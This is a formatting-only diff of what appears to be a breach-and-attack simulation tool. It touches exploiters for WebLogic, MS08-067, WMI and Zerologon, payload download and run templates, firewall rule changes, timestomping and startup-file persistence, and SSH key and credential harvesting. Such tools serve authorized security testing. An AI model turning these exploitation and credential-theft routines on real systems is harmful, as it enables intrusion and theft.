"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory

View File

@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {
"linux":self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64,
"linux": self._config.dropper_target_path_linux,
"win32": self._config.dropper_target_path_win_32,
"win64": self._config.dropper_target_path_win_64,
}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
@ -170,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {}
candidate_services.update(
{
service:self.host.services[service]
service: self.host.services[service]
for service in self.host.services
if (
self.host.services[service]
@ -202,7 +202,7 @@ class WebRCE(HostExploiter):
else:
command = commands["windows"]
# Format command
command = command % {"monkey_path":path, "http_path":http_path}
command = command % {"monkey_path": path, "http_path": http_path}
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
@ -372,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path":dest_path,
"http_path":http_path,
"monkey_path": dest_path,
"http_path": http_path,
}
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command)
@ -402,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD}
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command)
self.add_executed_cmd(command)
@ -415,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False:
return resp
else:
return {"response":resp, "path":paths["dest_path"]}
return {"response": resp, "path": paths["dest_path"]}
def change_permissions(self, url, path, command=None):
"""
@ -430,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows")
return True
if not command:
command = CHMOD_MONKEY % {"monkey_path":path}
command = CHMOD_MONKEY % {"monkey_path": path}
try:
resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send()
@ -448,8 +448,7 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path "
"parameter."
"Could not change permission because monkey was not found. Check path " "parameter."
)
return False
LOG.info("Permission change finished")
@ -474,18 +473,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
)
command = RUN_MONKEY % {
"monkey_path":path,
"monkey_type":DROPPER_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"monkey_type": DROPPER_ARG,
"parameters": monkey_cmd,
}
else:
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port
)
command = RUN_MONKEY % {
"monkey_path":path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -556,7 +555,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
return {"src_path":src_path, "dest_path":dest_path}
return {"src_path": src_path, "dest_path": dest_path}
def get_default_dropper_path(self):
"""

View File

@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15
# Malicious requests' headers:
HEADERS = {
"Content-Type":"text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
}
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host):
super(WebLogic201710271, self).__init__(
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"}
host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
)
def get_exploit_config(self):
@ -292,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False
def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""})
headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True

View File

@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP,
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
}
def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
)

View File

@ -66,9 +66,7 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
)
return False
except Exception as exc:
@ -112,7 +110,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -121,7 +119,7 @@ class WmiExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
)

View File

@ -253,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = {
"RID":int(user_RID), # relative identifier
"lm_hash":lmhash,
"nt_hash":nthash,
"RID": int(user_RID), # relative identifier
"lm_hash": lmhash,
"nt_hash": nthash,
}
def store_extracted_creds_for_exploitation(self) -> None:
@ -274,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update(
{
user:{
"username":user,
"password":"",
"lm_hash":lmhash,
"ntlm_hash":nthash,
user: {
"username": user,
"password": "",
"lm_hash": lmhash,
"ntlm_hash": nthash,
}
}
)
@ -331,8 +331,7 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()

View File

@ -22,24 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
"version":1,
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers":{
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
"file":{
"class":"logging.FileHandler",
"level":"DEBUG",
"formatter":"standard",
"filename":None,
"handlers": {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file": {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "standard",
"filename": None,
},
},
"root":{"level":"DEBUG", "handlers":["console"]},
"root": {"level": "DEBUG", "handlers": ["console"]},
}
@ -128,8 +128,7 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
)
LOG.info(f"version: {get_version()}")

View File

@ -100,8 +100,7 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" %
self._default_server
"Default server: %s is already in command servers list" % self._default_server
)
def start(self):
@ -220,7 +219,7 @@ class InfectionMonkey(object):
# Order exploits according to their type
self._exploiters = sorted(
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -252,8 +251,7 @@ class InfectionMonkey(object):
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
)
time.sleep(time_to_sleep)
@ -346,7 +344,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
DELAY_DELETE_CMD % {"file_path":sys.executable},
DELAY_DELETE_CMD % {"file_path": sys.executable},
stdin=None,
stdout=None,
stderr=None,
@ -398,8 +396,7 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -458,8 +455,7 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)

View File

@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name":name}
netsh_args = {"name": name}
netsh_args.update(kwargs)
try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args.update(kwargs)
try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"program":program}
netsh_args = {"program": program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):

View File

@ -52,7 +52,6 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -60,12 +59,10 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")

View File

@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username":ID_STRING, "password":ID_STRING}
CREDS = {"username": ID_STRING, "password": ID_STRING}
CONNECTION_DETAILS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
"no_auth":"password authentication failed",
"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
"no_auth": "password authentication failed",
"no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):

View File

@ -169,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple(
[
e.replace(b"\x00", b"").decode()
for e in data[47 + length:].split(b"\x00\x00\x00")[:2]
for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
]
)

View File

@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed":'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off',
}
_RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join(
"pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join(
"pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
]
),
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join(
"ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join(
"ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
}
_RESULT_STRINGS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"],
],
# SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"],
],
# all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"],
],
# selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"],
],

View File

@ -81,8 +81,7 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,6 +9,5 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
)

View File

@ -62,8 +62,7 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,9 +1,7 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,8 +19,7 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]

View File

@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda:MONKEY_DIR_PATH,
lambda: MONKEY_DIR_PATH,
)
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:False,
lambda: False,
)
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:True,
lambda: True,
)

View File

@ -10,5 +10,6 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,6 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed)
"""
return {
"name":name,
"home_dir":home_dir,
"public_key":None,
"private_key":None,
"known_hosts":None,
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
}
@staticmethod
@ -84,8 +84,7 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key",
"Path: %s" % private
ScanStatus.USED, "SSH key", "Path: %s" % private
).send()
else:
continue

View File

@ -80,8 +80,8 @@ class InfoCollector(object):
"""
LOG.debug("Reading subnets")
self.info["network_info"] = {
"networks":get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(),
"networks": get_host_subnets(),
"netstat": NetstatCollector.get_netstat_info(),
}
def get_azure_info(self):

View File

@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {}
if aws.is_instance():
logger.info("Machine is an AWS instance")
info = {"instance_id":aws.get_instance_id()}
info = {"instance_id": aws.get_instance_id()}
else:
logger.info("Machine is NOT an AWS instance")

View File

@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict:
return {"environment":get_monkey_environment()}
return {"environment": get_monkey_environment()}

View File

@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
return {"hostname":socket.getfqdn()}
return {"hostname": socket.getfqdn()}

View File

@ -30,23 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
"name":process.name(),
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":" ".join(process.cmdline()),
"full_image_path":process.exe(),
"name": process.name(),
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": " ".join(process.cmdline()),
"full_image_path": process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name":"null",
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":"ACCESS DENIED",
"full_image_path":"null",
"name": "null",
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": "ACCESS DENIED",
"full_image_path": "null",
}
continue
return {"process_list":processes}
return {"process_list": processes}

View File

@ -20,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
(AF_INET, SOCK_STREAM):"tcp",
(AF_INET6, SOCK_STREAM):"tcp6",
(AF_INET, SOCK_DGRAM):"udp",
(AF_INET6, SOCK_DGRAM):"udp6",
(AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM): "udp6",
}
@staticmethod
@ -34,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
"proto":NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0],
"local_port":c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None,
"status":c.status,
"pid":c.pid,
"proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address": c.laddr[0],
"local_port": c.laddr[1],
"remote_address": c.raddr[0] if c.raddr else None,
"remote_port": c.raddr[1] if c.raddr else None,
"status": c.status,
"pid": c.pid,
}

View File

@ -28,7 +28,7 @@ class SystemInfoCollectorsHandler(object):
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors":system_info_telemetry}).send()
SystemInfoTelem({"collectors": system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:

View File

@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key:cred.to_dict()})
cred_dict.update({key: cred.to_dict()})
return cred_dict

View File

@ -8,123 +8,119 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
"authentication_id":555555,
"session_id":3,
"username":"Monkey",
"domainname":"ReAlDoMaIn",
"logon_server":"ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086,
"msv_creds":[
"authentication_id": 555555,
"session_id": 3,
"username": "Monkey",
"domainname": "ReAlDoMaIn",
"logon_server": "ReAlDoMaIn",
"logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid": 123086,
"msv_creds": [
{
"username":"monkey",
"domainname":"ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash": None,
"SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
}
],
"wdigest_creds":[
"wdigest_creds": [
{
"credtype":"wdigest",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme",
"luid":123086,
"credtype": "wdigest",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme",
"luid": 123086,
}
],
"ssp_creds":[
"ssp_creds": [
{
"credtype":"wdigest",
"username":"monkey123",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme123",
"luid":123086,
"credtype": "wdigest",
"username": "monkey123",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme123",
"luid": 123086,
}
],
"livessp_creds":[
"livessp_creds": [
{
"credtype":"wdigest",
"username":"monk3y",
"domainname":"ReAlDoMaIn",
"password":"canyoufindm3",
"luid":123086,
"credtype": "wdigest",
"username": "monk3y",
"domainname": "ReAlDoMaIn",
"password": "canyoufindm3",
"luid": 123086,
}
],
"dpapi_creds":[
"dpapi_creds": [
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"credtype": "dpapi",
"key_guid": "9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
